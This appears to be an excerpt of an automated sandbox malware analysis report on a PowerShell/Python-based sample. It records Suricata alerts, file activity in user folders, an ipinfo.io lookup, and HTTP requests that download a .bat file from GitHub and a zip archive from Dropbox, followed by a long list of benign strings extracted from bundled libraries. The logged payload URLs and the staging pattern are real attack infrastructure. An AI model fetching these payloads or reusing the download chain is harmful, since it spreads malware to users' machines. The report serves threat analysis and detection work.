          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\idle_test\README.txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\README.txtJump to behavior
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.5:49724 version: TLS 1.2
          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000013.00000000.2362705216.00007FF606182000.00000002.00000001.01000000.00000007.sdmp, python.exe.2.dr
          Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: vcruntime140.dll.2.dr
          Source: Binary string: and f.endswith(('.exe', '.pdb'))): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: _overlapped.pyd.2.dr
          Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.2.dr
          Source: Binary string: if not srcfile.endswith(('.exe', '.pdb')): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2841189 - Severity 1 - ETPRO MALWARE Terse Request for .bat - Likely Hostile : 192.168.2.5:49721 -> 140.82.121.3:443
          Source: Network trafficSuricata IDS: 2841189 - Severity 1 - ETPRO MALWARE Terse Request for .bat - Likely Hostile : 192.168.2.5:49722 -> 185.199.108.133:443
          Source: global trafficTCP traffic: 192.168.2.5:54794 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /ty9989/u/raw/main/ud.bat HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ty9989/u/main/ud.bat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cd/0/get/CmClwU6KOY_G7DxBCyyyczV6fxL6vakNABlUhGPCy7enXbu24Z-ytq4R5xEb_4HUzgIwLTeTUCEJkDqxc2OXuabvCdUPhXjDCFhIkDRnPr7sP0dsKWYubmPLk0NPKUFV3ihb-4qMEd1OdvEoVV5FJ2Nr/file?dl=1 HTTP/1.1Host: uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 162.125.66.18 162.125.66.18
          Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
          Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: ipinfo.io
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /ty9989/u/raw/main/ud.bat HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ty9989/u/main/ud.bat HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /cd/0/get/CmClwU6KOY_G7DxBCyyyczV6fxL6vakNABlUhGPCy7enXbu24Z-ytq4R5xEb_4HUzgIwLTeTUCEJkDqxc2OXuabvCdUPhXjDCFhIkDRnPr7sP0dsKWYubmPLk0NPKUFV3ihb-4qMEd1OdvEoVV5FJ2Nr/file?dl=1 HTTP/1.1Host: uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.comConnection: Keep-Alive
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: github.com
          Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
          Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
          Source: global trafficDNS traffic detected: DNS query: uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com
          Source: global trafficDNS traffic detected: DNS query: ipinfo.io
          Source: webdriver.py2.2.drString found in binary or memory: http://127.0.0.1:4444
          Source: webdriver.py2.2.drString found in binary or memory: http://127.0.0.1:4444/wd/hub
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artax.karlin.mff.cuni.cz/~mikulas/links/
          Source: python.exe, 00000013.00000003.2418776024.0000019F8E955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue12029
          Source: python.exe, 00000013.00000003.2423013158.0000019F8F47B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue14396.
          Source: python.exe, 00000013.00000003.2423013158.0000019F8F47B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue15756
          Source: python.exe, 00000013.00000003.2418776024.0000019F8E955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19404
          Source: python.exe, 00000013.00000003.2366940367.0000019F8DAE8000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2365118607.0000019F8DAE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19619
          Source: test_extcall.py.2.drString found in binary or memory: http://bugs.python.org/issue2016
          Source: test_sdist.py.2.drString found in binary or memory: http://bugs.python.org/issue2279
          Source: python.exe, 00000013.00000003.2421013568.0000019F8E481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue23606)
          Source: api.cpython-310.pyc0.2.drString found in binary or memory: http://bugs.python.org/issue23606)zGctypes.util.find_library()
          Source: python.exe, 00000013.00000003.2368314133.0000019F8E21C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5845#msg198636
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4D0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue6857.
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE63A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue7250
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: python.exe, 00000013.00000003.2426075683.0000019F8E301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
          Source: python.exe, 00000013.00000003.2396422827.0000019F8E4B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401608333.0000019F8E4AA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2394361873.0000019F8E4A1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401703567.0000019F8E4B6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2396039540.0000019F8E4A2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398922814.0000019F8E4AA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2395495378.0000019F8E4A1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401317346.0000019F8E4A7000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398412884.0000019F8E4A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/259174/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: libcrypto-1_1.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: python.exe, 00000013.00000003.2418776024.0000019F8E955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
          Source: test_fractions.py.2.drString found in binary or memory: http://docs.python.org/lib/decimal-recipes.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE5FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE5FE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
          Source: sessions.py.2.drString found in binary or memory: http://domain.tld/path/to/resource
          Source: sessions.py.2.drString found in binary or memory: http://host.name
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://javascript.crockford.com/tdop/tdop.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE54D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lists.sourceforge.net/lists/listinfo/optik-users).
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynx.browser.org/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynx.isc.org/
          Source: powershell.exe, 00000002.00000002.2559482089.0000023CF3E5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2559482089.0000023CF3D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE55AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE3EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE461B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pythonpaste.org)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE3C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE48AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: readme.txt.2.drString found in binary or memory: http://sf.net/projects/adodbapi.
          Source: setup.py.2.dr, readme.txt.2.drString found in binary or memory: http://sourceforge.net/projects/adodbapi
          Source: test_pointers.py.2.drString found in binary or memory: http://sourceforge.net/tracker/?func=detail&aid=1518190&group_id=5470&atid=105470
          Source: test_pointers.py.2.drString found in binary or memory: http://sourceforge.net/tracker/?func=detail&atid=532154&aid=1467852&group_id=71702
          Source: ietoolbar.cpython-310.pyc.2.drString found in binary or memory: http://starship.python.net/crew/mhammond/)
          Source: contentmanager.py.2.drString found in binary or memory: http://tools.ietf.org/html/rfc2046#section-5.2.1
          Source: contentmanager.py.2.drString found in binary or memory: http://tools.ietf.org/html/rfc2046#section-5.2.3
          Source: contentmanager.py.2.drString found in binary or memory: http://tools.ietf.org/html/rfc2046#section-5.2.4
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://w3m.sourceforge.net/
          Source: _mode_ocb.cpython-310.pyc.1784826189776.19.drString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
          Source: options.py5.2.dr, webdriver.py2.2.dr, remote_connection.py.2.dr, __init__.py22.2.dr, shadowroot.py.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE3EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE55AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE55A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE508E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
          Source: python.exe, 00000013.00000003.2427164804.0000019F90881000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2428965531.0000019F90887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)
          Source: python.exe, 00000013.00000003.2438416021.0000019F90841000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2427164804.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2437802501.0000019F9083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)Fz
          Source: python.exe, 00000013.00000003.2396422827.0000019F8E4B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401608333.0000019F8E4AA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2394361873.0000019F8E4A1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401703567.0000019F8E4B6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2396039540.0000019F8E4A2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398922814.0000019F8E4AA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2395495378.0000019F8E4A1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401317346.0000019F8E4A7000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398412884.0000019F8E4A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6239000.00000004.00000800.00020000.00000000.sdmp, _overlapped.pyd.2.dr, python.exe.2.dr, libcrypto-1_1.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: python.exe, 00000013.00000003.2396422827.0000019F8E4B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401608333.0000019F8E4AA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2394361873.0000019F8E4A1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401703567.0000019F8E4B6000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2396039540.0000019F8E4A2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398922814.0000019F8E4AA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2395495378.0000019F8E4A1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401317346.0000019F8E4A7000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398412884.0000019F8E4A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE48AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/character-sets
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE508E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE498A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE497C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4A20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.megginson.com/SAX/.
          Source: readme.txt.2.drString found in binary or memory: http://www.opensource.org/licenses/lgpl-license.php
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE508E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4CCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/sax/properties/encoding
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/sax/properties/interning-dict
          Source: readme.txt.2.drString found in binary or memory: http://www.python.org/topics/database/DatabaseAPI-2.0.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE487A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE486E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pythonware.com
          Source: _mode_ocb.cpython-310.pyc.1784826189776.19.drString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/rfc/rfc%d.txt
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE609C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.robotstxt.org/norobots-rfc.txt
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE609C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sitemaps.org/protocol.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xmlrpc.com/discuss/msgReader$1208
          Source: msg_19.txt.2.drString found in binary or memory: http://www.zzz.org/mailman/listinfo/ppp
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities
